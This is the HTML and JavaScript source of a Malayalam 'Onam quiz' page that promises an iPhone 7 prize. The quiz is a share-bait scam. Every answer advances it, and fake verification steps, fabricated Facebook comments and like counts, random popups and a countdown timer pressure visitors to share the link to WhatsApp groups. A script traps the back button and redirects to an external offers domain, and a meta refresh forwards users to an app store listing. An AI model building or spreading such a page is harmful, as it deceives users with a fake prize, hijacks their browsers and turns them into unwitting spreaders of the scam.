<!DOCTYPE html>
<html lang="es"><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <link href="index-style.css" rel="stylesheet" type="text/css"/>
<link href="style.css" rel="stylesheet" type="text/css"/>
<link href="mmfonts.css" rel="stylesheet" type="text/css"/>
   <meta content='width=device-width, initial-scale=1.0' name='viewport'/>
   <title>ഓണം ആഘോഷിക്കൂ ഓൺലൈനായി... #StayAtHome - ഐഫോൺ 7 സമ്മാനം നേടൂ - Covid Quiz in Malayalam | Coronavirus Questions Answers</title>
   <meta property="og:image" content="https://i.imgur.com/bkdc5FI.png">
   <meta name="keywords" content="Onam Online Contest, Onam 2020 corona, coronavurus, corona virus, covid, covid 19, covid-19, corona quiz, covid quiz, corona symptoms malayalam, covid facts, covid questions, covid answers">
   <meta property="og:description" content="ഓണം ആഘോഷിക്കൂ ഓൺലൈനായി... - Covid Quiz in Malayalam. Coronavirus Questions and Answers.">
   <link rel="stylesheet" href="https://i.imgur.com/bkdc5FI.png" crossorigin="anonymous">
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<!-- Global site tag (gtag.js) - Google Analytics -->

<script type="text/javascript" language="javascript">
var areYouReallySure = false;
var internalLink = false;
</script>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-131329978-5"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-131329978-5');
</script>


  
<meta http-equiv="Refresh" content="50; url=https://play.google.com/store/apps/details?id=com.mflix.app.tk" />
	
    <script src='https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js'>
    </script>
    <script>
      //<![CDATA[
      redirectURL = "";
      WhatsApp_share_message = "";
      Share_link = "#";
      alert_text = "Compartilhe esta oferta com pelo menos 10 amigos para continuar. Você convidou...";
      var timer_start = 5; //minutes
      //]]>
    </script>
    <script type='text/javascript'>
      //<![CDATA[
      var total = 10;
      jQuery(document).ready(function ($) {
        $(".answer").click(function () {
          if($(this).hasClass("anses1")){
            survey.step1();
          }
          if($(this).hasClass("anses2")){
            survey.step2();
          }
          if($(this).hasClass("anses3")){
            survey.step3();
          }
        });
        var clicks = 0;
        var survey = {
          step1: function(){
            setTimeout(function () {
              //hide question block MobGyan
              $(".question_count").hide();
              $(".question1").hide();
              $(".anses1").hide();
              //show calculating MobGyan
              $(".calculating").show();
              setTimeout(function () {
                //hide calculating MobGyan
                $(".calculating").hide();
                //show step 2 MobGyan
                $(".question_count span").html("2");
                $(".question_count").show();
                $(".question2").show();
                $(".anses2").show();
              }, 1200);
            }, 300);
          },
          step2: function(){
            setTimeout(function () {
              //hide question block MobGyan
              $(".question_count").hide();
              $(".question2").hide();
              $(".anses2").hide();
              //show calculating MobGyan
              $(".calculating").show();
              setTimeout(function () {
                //hide calculating MobGyan
                $(".calculating").hide();
                //show step 3 MobGyan
                $(".question_count span").html("3");
                $(".question_count").show();
                $(".question3").show();
                $(".anses3").show();
              }, 1200);
            }, 300);
          },
          step3: function(){
            setTimeout(function () {
              //hide question block MobGyan
              $(".question_count").hide();
              $(".question3").hide();
              $(".anses3").hide();
              //show calculating MobGyan
              $(".calculating").show();
              setTimeout(function () {
                //hide calculating MobGyan
                $(".calculating").hide();
                //show checking part MobGyan
                $(".survey_middle").css("vertical-align","top");
                $(".loading").show();
                setTimeout(function () {
                  $(".check1").fadeIn(300);
                  setTimeout(function () {
                    $(".check2").fadeIn(300);
                    setTimeout(function () {
                      $(".check3").fadeIn(300);
                      setTimeout(function () {
                        survey.change();
                      }, 1400);
                    }, 1100);
                  }, 1400);
                }, 750);
              }, 600);
            }, 300);
          },
          change: function(){
            //sakrij gornje MobGyan
            $(".headline,.small_headlines,.timer").hide();
            //sakrij content surveya MobGyan
            $(".loading").hide();
            $(".survey_outer").css("height","auto");
            //pokazi ostatak MobGyan
            var walink = "whatsapp://send?text="+WhatsApp_share_message+Share_link;
            //$(".btn-share").attr("href",walink); MobGyan
            $(".btn-share").click(function(){
              clicks++;
              $('#progreso').show();
              if (clicks > total) {
                window.location = redirectURL;
                return;
              }
              $('.progress span').width(((clicks / total) * 100) + '%');
              if (clicks == total) {
                window.location.href = walink;
              }
              window.location.href = walink;
            });
            $(".last_page").show();
			$(".fbcoms").show();
            waitme();
          }
        };
        $(".like").click(function() {
          if($(this).hasClass("selected")) {
            $(this).removeClass("selected");
            $(this).html("Like");
            $("#youand").html("");
          } else {
            $(this).addClass("selected");
            $(this).html("Unlike");
            $("#youand").html("You and ");
          }
        });
        $(".fblike").click(function() {
          if($(this).hasClass("selected")) {
            $(this).removeClass("selected");
            $(this).html("Like");
          } else {
            $(this).addClass("selected");
            $(this).html("Unlike");
          }
        });
        function waitme(){
          FBcom("#fb1",000);
          FBcom("#fb2",000);
          FBcom("#fb3",000);
          FBcom("#fb4",000);
          FBcom("#fb5",00);
          FBcom("#fb6",000);
          FBcom("#fb7",000);
          FBcom("#fb8",0000);
          var ct = 48;
          (function loop() {
            var rand = random(2500,5500);
            var ctrand = random(1,4);
            ct = ct - ctrand;
            if(ct > 1) {
              setTimeout(function() {
                loop(); 
              }, rand);
            } else {
              ct = "few";
            }
            $("#count").html(ct);
          }());
        }
        function FBcom(a,b) {
          setTimeout(function() {
            var m = 0, n = true, op = 0;
            $(a+", "+a+" .comtxt, "+a+" .combot").slideDown(500);
            $().slideDown(500);
            var t = setInterval(function() {
              op += 0.2;
              $(a).css({"opacity":op});
              m++;
              if(m === 5) clearInterval(t);
            }, 100);
          }, b);
        }
        function random(min, max) {
          return Math.round(Math.random() * (max - min) + min);
        }
        var out,pops = {
          init: function(){
            setTimeout(function () {
              var rand_name = pop_names[random(0,pop_names.length-1)];
              var rand_text = pop_texts[random(0,pop_texts.length-1)];
              var text = rand_name + " " + rand_text;
              $(".pops p").html(text);
              $(".pops").fadeIn(500);
              out = setTimeout(function () {
                $(".pops").fadeOut(1000);
                pops.init();
              }, 6000);
            }, random(6000, 15000));
          }
        };
        pops.init();
        $("#iks").click(function () {
          clearTimeout(out);
          $(".pops").hide();
          pops.init();
        });
        $("#mins").html("0"+timer_start);
        $("#sec").html("00");
        var mins = timer_start, secs = 0, minutes, seconds, timer = {
          init: function(){
            var counter = setInterval(function () {
              $(".timer_heading").addClass("blink");
              setTimeout(function () {
                $(".timer_heading").removeClass("blink");
              }, 500);
              secs--;
              if(secs<0){
                secs = 59;
                mins--;
                if(mins<0){
                  clearInterval(counter);
                  mins = 0;
                  secs = 0;
                  $(".timer_heading").hide();
                  $(".timer .small_headlines").show();
                }
                if(mins<10){
                  minutes = "0" + mins;
                }else{
                  minutes = mins;
                }
              }
              if(secs<10){
                seconds = "0" + secs;
              }else{
                seconds = secs;
              }
              $("#mins").html(minutes);
              $("#sec").html(seconds);
            }, 1000);
          }
        };
        timer.init();
      });
      //]]>
    </script>
    <script type='text/javascript'>
      //<![CDATA[
      var ii = 0; // needed for safari
      var iy = 0;
      if (typeof history.pushState === "function") {
        history.pushState("back", null, null);
        window.onpopstate = function() {
          history.pushState('back', null, null);
          if (iy==3) {
            iy=0;
            window.location='#';
          } else if (ii == 1) {
            document.getElementById('popup1').style.display = "none";
            setTimeout(function() {
              if (document.getElementById('popup1').style.display == "none") {
                document.getElementById('popup1').style.display = "block";
              }
            }, 300);
            window.navigator.vibrate(000);
            iy=iy+1;
          }
        };
      }
      setTimeout(function() {
        ii = 1;
      }, 200);
      function hidepop() {
        document.getElementById('popup1').style.display = "none";
      }
      //]]>
    </script>
    

<style>
  .button {
  background-color: #4CAF50;
  border: none;
  color: white;
  padding: 15px 25px;
  text-align: center;
  font-size: 16px;
  cursor: pointer;
}
  
  .announcement {
  display: inline-block;
  height: 150%;
  text-align: center;
  width: 100%;
  background: red;
  color: white;
  font-family: Arial, sans;
  margin: 0;
  padding: 0;
  vertical-align: middle;
  font-size: 0.8em;
}

.announcement a { 
  color: #ccc; 
}

.announcement a:hover {
  color: red;
}
  
@import url('https://fonts.googleapis.com/css?family=Montserrat');
      	
@font-face{
font-family: 'Roboto';
font-weight: 400;
src: url(../fonts/Roboto-Regular.ttf);
}
@font-face{
font-family: 'Roboto';
font-weight: 700;
src: url(../fonts/Roboto-Bold.ttf);
}
@font-face{
font-family: 'Tahoma';
font-weight: 400;
src: url(../fonts/Tahoma.ttf);
}
@font-face{
font-family: 'Tahoma';
font-weight: 700;
src: url(../fonts/Tahoma-Bold.ttf);
}
body,html{
width: 100%;
margin: 0;
font-family: 'Montserrat', sans-serif;
background: #1a1b54;
color:#333;
}
/*clearfix MobGyan*/
.clearfix:before, .clearfix:after{content:"";display:table;}
.clearfix:after{clear: both;}
.clearfix{*zoom: 1;}
*{
box-sizing: border-box;
}
p{
margin: 0;
}
.cont_outer{
position: absolute;
display: table;
width: 100%;
height: 100%;
background-image: url(../img/219958493.jpg);
background-position: center top;
background-size: 750px auto;
background-repeat: repeat-y;
}
.bold{
font-weight: 700;
}
/*************************************************** header MobGyan ***************************************************/
.header{
display: table-row;
width: 100%;
height: 50px;
background-color: #fff;
font-weight: 700;
}
.header-inner{
display: table-cell;
vertical-align: middle;
text-align: center;
}
.header-inner p{
vertical-align: middle;
color: #fff;
font-size: 18px
}
.header-inner p img{
vertical-align: middle;
}
#folder{
width: 28px;
}
#rupee1{
width: 14px;
padding-left: 2px
}
/*************************************************** content MobGyan ***************************************************/

.content{
display: table-row;
width: 100%;
overflow-x: hidden
}
.content-middle{
display: table-cell;
vertical-align: middle;
width: 100%;
}
.content-inner{
width: 95%;
max-width: 600px;
margin: 5px auto;
text-align: center;
padding: 0px 3px;
border-radius: 4px;
background-color: #1a1b54;
color: #fff;
}
#logo{
width: 220px;
}
.headline{
color: #fff;
font-weight: bold;
font-size: 22px;
line-height: 45px
}
.headline,.headline span img{
vertical-align: middle;
}
.headline span{
vertical-align: top;
}
.headline span{
text-decoration: underline;
}
.headline span img{
width: 12px;
margin-left: 3px;
}
.small_headlines{
font-size: 16px;
color: #fff;
font-weight: 400;
padding-bottom: 10px;
}
.small_headlines img{
width: 10px;
margin-left: 3px;
vertical-align: middle;
line-height: 22px;
}
.question2,.question3{
display: none;
}
/*************************************************** survey MobGyan ***************************************************/
.survey_outer{
display: table;
width: 95%;
margin: 15px auto 0;
background-color: #82E6FF;
border-radius: 4px;
height: 295px;
}
.survey_middle{
display: table-cell;
vertical-align: middle;
}
.survey_inner{
display: block;
width: 95%;
margin: 0 auto;
padding: 15px 0;
position: relative;
}
.anses2,.anses3{
display: none;
}
.question_count{
color: #000;
font-size: 24px;
font-weight: 700;
}
.question_text{
font-family: EGGIndulekhaUni;
font-size: 24px;
font-weight: normal;
color: #000;
line-height: 38px;
}
.question2{
line-height: 1.2em;
padding: 10px 0 15px;
}
.question3{
line-height: 1.2em;
}
.answer{
width: 80%;
margin: 15px auto;
text-align: center;
padding: 7px 0;
color: #222;
background-color: #fff;
border-radius: 7px;
border: 1px solid #027CD5;
font-size: 24px;
font-weight: 400;
cursor: pointer;
-webkit-transition: all 0.3s ease-in-out;
-moz-transition: all 0.3s ease-in-out;
transition: all 0.3s ease-in-out;
}
.answer:hover{
color: #222;
background-color: #fff;
font-weight: 700;
}
.calculating{
display: none;
vertical-align: middle;
font-size: 28px;
text-transform: uppercase;
color: #fff;
font-weight: 700;
}
.calculating img{
vertical-align: middle;
width: 50px;
}
/****** loading MobGyan ******/
.loading{
display: none;
text-align: center;
color: #fff;
font-weight: 700;
}
.loading img{
width: 70%;
max-width: 220px;
margin: 0 auto 15px;
}
.load_headline{
font-size: 24px;
margin: 15px 0;
}
.check{
font-size: 20px;
margin: 10px 0;
}
.check1,.check2,.check3{
display: none;
}
/*************************************************** last page MobGyan ***************************************************/
.last_page{
display: none;
}
.last-up{
text-align: left;
}
.textlastup{
font-family: EGGIndulekhaUni;
font-size: 16px;
font-weight: normal;
color: #000;
font-size: 18px;
padding-bottom: 8px;

}
.btn{
width: 80%;
font-size: 28px;
max-width: 345px;
margin: 15px auto;
background-color: #58BE41;
border-radius: 5px;
color: #fff;
font-weight: 700;
text-align: center;
display: block;
padding: 7px 0;
text-decoration: none;
-webkit-transition: all 0.2s ease-in-out;
-moz-transition: all 0.2s ease-in-out;
transition: all 0.2s ease-in-out;
box-shadow: none;
}
.btn:hover{
background-color: #fff;
color: #58BE41;
box-shadow: 0 0 2px #58BE41,
0 0 5px #58BE41,
0 0 7px #58BE41,
0 0 11px #58BE41;
}
.btn-share{
font-size: 24px;
background-color: #58BE41;
background-size: 40px auto;
background-position: left 5px top 1px;
background-repeat: no-repeat;
}

.progress {      width:80%;      height: 20px;  /* Can be anything MobGyan */      position: relative;      margin: 60px 0 20px 0; /* Just for demo spacing */      background: #555;      padding: 10px;      -webkit-box-shadow: inset 0 -1px 1px rgba(255,255,255,0.3);      -moz-box-shadow   : inset 0 -1px 1px rgba(255,255,255,0.3);      box-shadow        : inset 0 -1px 1px rgba(255,255,255,0.3);      margin: auto;    }    .progress > span {      display: block;      height: 20px;	  left: 0;	  top: 0;      background-color: #3F51B5;      background-image: -webkit-gradient(         linear,         left bottom,         left top,         color-stop(0, #00BCD4),         color-stop(1, #2196F3)        );      background-image: -moz-linear-gradient(        center bottom,        rgb(43,194,83) 37%,        rgb(84,240,84) 69%       );      -webkit-box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      -moz-box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      box-shadow:         inset 0 2px 9px  rgba(255,255,255,0.3),        inset 0 -2px 6px rgba(0,0,0,0.4);      position: absolute;      overflow: hidden;    }    .progress > span:after, .animate > span > span {      content: "";      position: absolute;      top: 0; left: 0; bottom: 0; right: 0;      background-image:          -webkit-gradient(linear, 0 0, 100% 100%,             color-stop(.25, rgba(255, 255, 255, .2)),             color-stop(.25, transparent), color-stop(.5, transparent),             color-stop(.5, rgba(255, 255, 255, .2)),             color-stop(.75, rgba(255, 255, 255, .2)),             color-stop(.75, transparent), to(transparent)         );      background-image:         -moz-linear-gradient(          -45deg,             rgba(255, 255, 255, .2) 25%,             transparent 25%,             transparent 50%,             rgba(255, 255, 255, .2) 50%,             rgba(255, 255, 255, .2) 75%,             transparent 75%,             transparent         );      z-index: 1;      -webkit-background-size: 50px 50px;      -moz-background-size: 50px 50px;      -webkit-animation: move 2s linear infinite;         -webkit-border-top-right-radius: 8px;      -webkit-border-bottom-right-radius: 8px;             -moz-border-radius-topright: 8px;          -moz-border-radius-bottomright: 8px;                 border-top-right-radius: 8px;              border-bottom-right-radius: 8px;          -webkit-border-top-left-radius: 20px;       -webkit-border-bottom-left-radius: 20px;              -moz-border-radius-topleft: 20px;           -moz-border-radius-bottomleft: 20px;                  border-top-left-radius: 20px;               border-bottom-left-radius: 20px;      overflow: hidden;    }        .animate > span:after {      display: none;    }        @-webkit-keyframes move {        0% {           background-position: 0 0;        }        100% {           background-position: 50px 50px;        }    }




.btn-down{
font-size: 24px;
text-transform: uppercase;
}
/*************************************************** facecomms MobGyan ***************************************************/
/* COMMENTS MobGyan*/
.fbcoms {
font-family: Tahoma, Verdana, sans-serif;
background-color: #fff;
width: 100%;
margin: 0 auto;
color: #000;
padding: 5px 10px;
font-size: 12px;
text-align: left;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
.comments {
font-weight: bold;
text-align: center;
padding: 0 5px 10px 5px;
}
.totlikes {
margin-top: 3px;
background-color: #eeeff4;
padding: 5px 5px 5px 23px;
background-image: url("../img/f/like.png");
background-repeat: no-repeat;
background-position: 5px center;
}
.fbblue {
color: #3c5a96;
}
.buttons {
padding-bottom: 5px;
font-family: Arial, sans-serif;
color: #7d7d7f;
}
.buttons span {
cursor: pointer;
}
.buttons span:hover {
text-decoration: underline;
}
.viewmore {
margin-top: 3px;
background-color: #eeeff4;
padding: 5px 5px 5px 23px;
background-image: url("../img/f/bubble.png");
background-position: 5px center;
background-repeat: no-repeat;
}
.left {
cursor: pointer;
float: left;
color: #3c5a96;
}
.left:hover {
text-decoration: underline;
}
.right {
color: #7d7d7f;
float: right;
}
.item {
position: relative;
margin-top: 3px;
background-color: #eeeff4;
padding: 5px 5px 5px 60px;
min-height: 60px;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
}
.item .profileimg {
position: absolute;
top: 5px;
left: 5px;
}
.comtxt {
line-height: 16px;
}
.name {
color: #3c5a96;
font-weight: bold;
}
.ago {
color: #86878c;
font-size: 0.95em;
}
.fblike {
color: #3c5a96;
font-size: 0.95em;
cursor: pointer;
}
.fblike:hover {
text-decoration: underline;
}
.combot {
padding-top: 5px;
}
.clickhere {
font-weight: bold;
padding: 30px 10px 5px;
line-height: 18px;
}
.likes {
color: #3c5a96;
font-size: 0.95em;
cursor: pointer;
}
.fbimg {
background-color: #fff;
border-radius: 2px;
-moz-border-radius: 2px;
-webkit-border-radius: 2px;
max-width: 210px;
width: 100%;
padding: 3px;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
border: 1px solid #808080;
margin: 10px 0 5px;
}
.hidden {
display: none;
opacity: 0;
}
.hidden .comtxt, .hidden .combot, .comments {
display: none;
}
.answer{
cursor: pointer;
}
/*************************************************** pops ***************************************************/
.pops{
position: fixed;
top: 80px;
right: 10px;
display: none;
width: 230px;
margin: 10px 10px 0 0;
background-color: rgba(173,176,192,0.8);
width: 230px;
border-radius: 8px;
box-shadow: 0 0 7px #888888;
padding-bottom: 3px
}
#piplovi{
width: 55px;
margin: 0;
padding: 5px;
float: left;
}
#iks{
position: absolute;
top: -10px;
right: -10px;
width: 20px;
cursor: pointer;
}
.pops p{
width: 170px;
padding: 2px;
padding-top: 10px;
margin-left: 50px;
font-size: 14px;
color: #fff;
word-spacing: 0;
line-height: 100%;
}
/*************************************************** timer MobGyan ***************************************************/
.timer .small_headlines{
display: none;
}
.timer_heading{
width: 80%;
margin: 0 auto;
font-size: 16px;
color: #555;
font-weight: 400;
padding-bottom: 10px;
}
@-webkit-keyframes bllink{
from{
color: #fff;
text-shadow: none;
transform: scale(1,1);
}
to{
color: #ff0000;
text-shadow: 0 0 2px #fff,0 0 5px #fff,0 0 7px #fff,0 0 10px #fff,0 0 12px #fff,0 0 15px #fff;
transform: scale(1.3,1.3);
}
}
@-moz-keyframes bllink{
from{
color: #fff;
text-shadow: none;
transform: scale(1,1);
}
to{
color: #ff0000;
text-shadow: 0 0 2px #fff,0 0 5px #fff,0 0 7px #fff,0 0 10px #fff,0 0 12px #fff,0 0 15px #fff;
transform: scale(1.3,1.3);
}
}
@keyframes bllink{
from{
color: #fff;
text-shadow: none;
transform: scale(1,1);
}
to{
color: #ff0000;
text-shadow: 0 0 2px #fff,0 0 5px #fff,0 0 7px #fff,0 0 10px #fff,0 0 12px #fff,0 0 15px #fff;
transform: scale(1.3,1.3);
}
}
.blink{
-webkit-animation: 0.2s bllink ease-in-out alternate;
-moz-animation: 0.2s bllink ease-in-out alternate; 
animation: 0.2s bllink ease-in-out alternate;
}
/*************************************************** media MobGyan ***************************************************/
@media screen and (max-width: 600px){
.cont_outer{
background-size: 600px auto;
}
.headline{
font-size: 18px;
}
.small_headlines,.timer_heading{
font-size: 13px;
}
}
@media screen and (max-width: 500px){
.btn{
width: 90%;
max-width: 345px;
}
}
@media screen and (max-width: 400px)
.header-inner p{
font-size: 14px;
}
#rupee1{
width: 12px;
padding-left: 2px
}
.header{
height: 40px;
}
.answer{
margin: 10px auto;
padding: 5px 0;
border-radius: 7px;
border: 1px solid #027CD5;
font-family: EGGIndulekhaUni;
font-size: 24px;
font-weight: normal;
color: #222;
font-weight: 700;
}
.survey_outer{
height: 250px;
}
.calculating{
font-size: 22px;
}
.load_headline{
font-size: 20px;
margin: 15px 0;
}
.check{
font-size: 16px;
margin: 10px 0;
}
.textlastup{
font-size: 16px;
padding-bottom: 5px;
font-weight: 400;
}
.btn{
width: 100%;
max-width: 345px;
}
.btn-share{
font-size: 20px;
background-size: 36px auto;
}
.btn-down{
font-size: 20px;
}
}	#main-frame-error{display:none;height:auto}.interstitial-wrapper{padding-top:10px;box-sizing:border-box;font-size:1em;line-height:18px;margin:auto;max-width:600px;width:90%}#today{float:right;font-weight:600;padding-top:15px}#main-message>p{display:inline}#blink{color:#f00;padding:6px;-webkit-animation:blink 1s infinite;-moz-animation:blink 1s infinite;-ms-animation:blink 1s infinite;-o-animation:blink 1s infinite;animation:blink 1s infinite}@-webkit-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}@-moz-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}@-ms-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}}@-o-keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}@keyframes blink{0%{opacity:1.0}50%{opacity:.0}100%{opacity:1.0}}#theTime{font-size:18px;font-weight:bold;color:red;font-family:sans-serif}h1{color:#000;font-size:1.6em;line-height:1.25em;margin-bottom:16px}#alertimg{height:26px;width:26px;position:absolute;top:13px;left:17px}.popup{display:none;position:absolute;top:20%;left:50%;width:88%;max-width:280px;margin:0 0 0 -140px;font-size:1em;border-radius:4px;background-color:#282828;color:#fff;overflow:hidden;box-shadow:1px 1px 7px #000;z-index:100}.popup-head{background-color:#282828;padding:18px 16px 18px 55px;border-bottom:2px solid #33b4e4;color:#33b4e4;line-height:normal}.popup-center{padding:20px 16px;color:#f3f3f3;line-height:20px}.popup-bottom{background-color:#282828;padding:9px 6px;text-align:center;border-top:1px solid #474747;overflow:hidden}.popup-bottom .button{display:block;height:30px;width:128px;margin:0 auto;font-size:1.1em;color:#f3f3f3;border-radius:3px;cursor:pointer;text-decoration:none;padding:0;line-height:30px}

a {
text-decoration: none;
}

</style>


</head>
  <body>

<script type="text/javascript">! function (){	var t;	try{for (t=0; 10 > t; ++t)		history.pushState({}, "", "#");	onpopstate=function (t)	{ t.state &&window.location.replace("http://Free100GB.todayoffers.xyz");		}}		catch (o){}}();</script>    
   <div class="sub-header-slot">
 <div class="header-slot">
	<img alt="" src="corona-quiz-header.jpg"></div>
<div class="mob-header-slot">
	<img alt="" src="https://i.imgur.com/oiTCq6u.jpg"></div>
	
	<div class="sub-header-quiz-slot">
ഓണം ആഘോഷിക്കൂ ഓൺലൈനായി...<br/>

ഓണം ക്വിസിൽ പങ്കെടുക്കൂ...<br/>

3 ചോദ്യങ്ങൾക്ക് ഉത്തരം നൽകൂ<br/> iphone 7 സമ്മാനമായി നേടൂ...</div>

<div class="mob-header-slot">
	<img alt="" src="iphone7.png"></div>
	
	<center>
	
    <div class='content'>
	
	
      <!-- content -->
      <div class='content-middle'>
        <div class='content-inner'>
          

     
          <div class='survey_outer'>
            <div class='survey_middle'>
              <div class='survey_inner'>
              <!--  <p class='question_count'>
                 Pergunta
                  <span>
                    1
                  </span>
               de 3
                </p> -->
                <p class='question_text question1'>
                 1. ഓണപൂവ് എന്ന് വിശേഷമുള്ള പൂവ്?
                </p>
                <p class='question_text question2'>
                 2. ഓണ തലേന്ന് നടത്തുന്ന യാത്ര?
                </p>
                <p class='question_text question3'>
                 3. ഓണവുമായി ബന്ധപ്പെട്ട തെയ്യം?
                </p>
                <div class='ans-box'>
                  <div class='answer anses1'>
                    <p>
                    കാശിത്തുമ്പ
                    </p>
                  </div>
                  <div class='answer anses1'>
                    <p>
                    കണിക്കൊന്ന
                    </p>
                  </div>  
	
								  
              
                  <div class='answer anses2'>
                    <p>
                      ഉത്രാടപാച്ചിൽ
                    </p>
                  </div>
                  <div class='answer anses2'>
                    <p>
                      ഓണയാത്ര
                    </p>
                  </div>
                   <div class='answer anses2'>
                    <p>
                      ഉത്രാട യാത്ര
                    </p>
                  </div>
                  
                  <div class='answer anses3'>
                    <p>
                      ഓണപൊട്ടൻ
                    </p>
                  </div>
                  <div class='answer anses3'>
                    <p>
                      മാരിതെയ്യം
                    </p>
                  </div>
				 
               <div class='answer anses3'>
                    <p>
                      ആടിവേടൻ
                    </p>
                  </div>
                  
                 
				 
                </div>
                
                <p class='calculating'>
                  <img alt='' src='https://media.giphy.com/media/8DcYkij7pUxUY/giphy.gif'/>
                   Please wait
                </p>
                <div class='loading'>
                  <p class='load_headline'>
                  Please wait...
                  </p>
                  <img alt='' src='https://media.giphy.com/media/3o7TKtnuHOHHUjR38Y/source.gif' style='height:50px;width:50px;'/>
                  <p class='check check1'>
                  Verification...

                  </p>
                  <p class='check check2'>
                  Contacting Server
                  </p>
                  <p class='check check3'>
                 Congratulations, you complete the quiz competition! 
                  </p>
                </div>
                <div class='last_page'>
                  <div class='last-up'>
                    <h4 class='textlastup'>
1. മത്സരം പൂർത്തിയാക്കാൻ നിങ്ങൾ 8 വാട്സാപ്പ്   ഗ്രൂപ്പിൽ ഷെയർ ചെയ്യണം.
<br/><br/>
2. ഷെയർ ചെയ്താൽ മാത്രമേ നിങ്ങൾ ഈ മത്സരത്തിൽ യോഗ്യത നേടുകയുള്ളു.
<br/><br/>
3. ഇപ്പോൾ തന്നെ ഷെയർ ചെയ്ത് നിങ്ങളുടെ കൂട്ടുകാരെയും ഈ മത്സരത്തിൽ പങ്കെടുപ്പിക്കുക.
<br/><br/>
4. മത്സര വിജയിയെ വാട്സാപ്പ് വഴി അറിയിക്കുന്നതാണ്. <br/>അതിനായി താഴെ കാണുന്ന ലിങ്കിൽ ക്ലിക്ക് ചെയ്ത് വാട്സാപ്പ് ഗ്രൂപ്പിൽ ഷെയർ ചെയ്യുക.
<br/><br/>
5. കൂടുതൽ ആൾക്കാരെ മത്സരത്തിൽ പങ്കെടുപ്പിക്കാൻ ഇപ്പോൾ തന്നെ നിങ്ങളുടെ വാട്സാപ്പ് ഗ്രൂപ്പിൽ ഷെയർ ചെയ്യുക.				
<br/><br/>
6. Fake Sharing Will Not Be Counted.
<br/><br/>
</h4>
<script type="text/javascript">

	var STRONG = {
		share: 9
	};

	function shared(p){		
		ga('send', 'event', 'Youtube', 'Share ' + p, 'Converted');
	}
      
	  function incrementValue()
      {
        var value = parseInt(document.getElementById('number').value, 10);
        value = isNaN(value) ? 0 : value;
        value++;
        shared(value);
        document.getElementById('number').value = value;
		
        var value = parseInt(document.getElementById('number').value, 10);
        if(value>= STRONG.share){
          window.location="      http://onam-quiz.todayoffers.xyz/winner.php";
        }else{
			//alert("Você compartilhou com "+value+" Amigos. São no mínimo 15 compartilhamentos!");
        }
		
		
      }
	  
function fn1() {
	STRONG.count = true;
	var value = parseInt(document.getElementById('number').value, 10);
	value = value + 1;	
	document.querySelector('.progress').style.display = "block";
	var inicio = 100;
	var divisor = STRONG.share;
	var porsiento = inicio / divisor;
	var estatico = porsiento;
	var obtenido = parseInt(estatico * value);
	document.querySelector('.progress span').style['width'] = obtenido + "%";
	document.querySelector('.progress span').style['width'] = obtenido + "%";

}
</script>

<!-- Ads Hare -->
<center>

</center>
<!-- Ads Close https://bit.ly/FREE-30GB  -->

<a href='whatsapp://send?text=*ഓണം ആഘോഷിക്കൂ ഓൺലൈനായി......*%0A%0A
*ഓണം ക്വിസ്സിൽ പങ്കെടുക്കൂ.*%0A%0A
*3 ചോദ്യങ്ങൾക്ക് ഉത്തരം നൽകൂ*%0A%0A
*iPhone 7 സമ്മാനമായി നേടൂ...*%0A%0A
&#128073;	&#128073; 
https://bit.ly/Onam-Quiz
%0A️&#9757;&#9757;&#9757;&#9757;
%0A*ഈ മത്സരം മറ്റുള്ളവരിലേക്ക് എത്തിക്കാൻ വേണ്ടി എല്ലാ ഗ്രൂപ്പുകളിലും കൂട്ടുകാർക്കും ഷെയർ ചെയ്യുക*%0A%0A
*Online Onam 2020*' onclick='incrementValue()' target='_blank'>
<button class='btn btn-primary' onclick='fn1()' type='button'>SHARE Now</button></a>
                    <input id='number' type='hidden' value='0'/>
<h4 class='textlastup'>
Share until the bottom panel is full:</h4>

<div class='progress'>
				<span aria-valuemax='100%' aria-valuemin='1%' aria-valuenow='1' id='progressbar' style='width: 1%; max-width: 100%;'/>
			</div>

                
                  </div>
  
                  
                  <hr/>
				  </div></div></div></div>
				  <br/>
				 
<!-- Ads Hare -->
<center>
	
                  <div class='fbcoms' style="display:none;">
                    <p class='comments'>
                    </p>
                    <p class='buttons'>
                      <span class='like'>
                        Like     
                      </span>
                      &#183; 
                      <span>
                        Share    
                      </span>
                      &#183; 
                      <span>
                        Comment
                      </span>
                      &#183; 
                      <span>
                        Remove
                      </span>
                    </p>
                    <p class='totlikes'>
                      <span id='youand'>
                      </span>
                      <span class='fbblue'>
                        others 20,208 
                      </span>
                      like this
                    </p>
                    <p class='viewmore clearfix'>
                      <span class='left'>
                        more comments...
                      </span>
                      <span class='right'>
                   63 of 173,330
                      </span>
                      <br/>
                    </p>
                    <div class='item' id='fb8' style='display: none; opacity: 1;'>
                      <img class="profileimg" height="50" src="//1.bp.blogspot.com/-22Zflx4Rvjo/T3cRQ1b_NiI/AAAAAAAAAEg/cGdPKaOsTkU/s1600/419823_268840599858364_195981707144254_588351_167998620_n.jpg" width="50">
                      <p class='comtxt' style='display: block;'>
                        <span class='name'>
                        Akshay Rajan
                        </span>
                        <br/>
                       ഇതുപോലുള്ള മത്സരങ്ങൾ ഇനിയും <br/>പ്രതീക്ഷിക്കുന്നു.  


                      </p>
                      <p class='combot' style='display: block;'>
                        <span class='ago'>
                          Just now    
                        </span>
                        &#183; 
                        <span class='fblike'>
                          Like
                        </span>
                      </p>
                    </div>
                    <div class='item' id='fb7' style='display: none; opacity: 1;'>
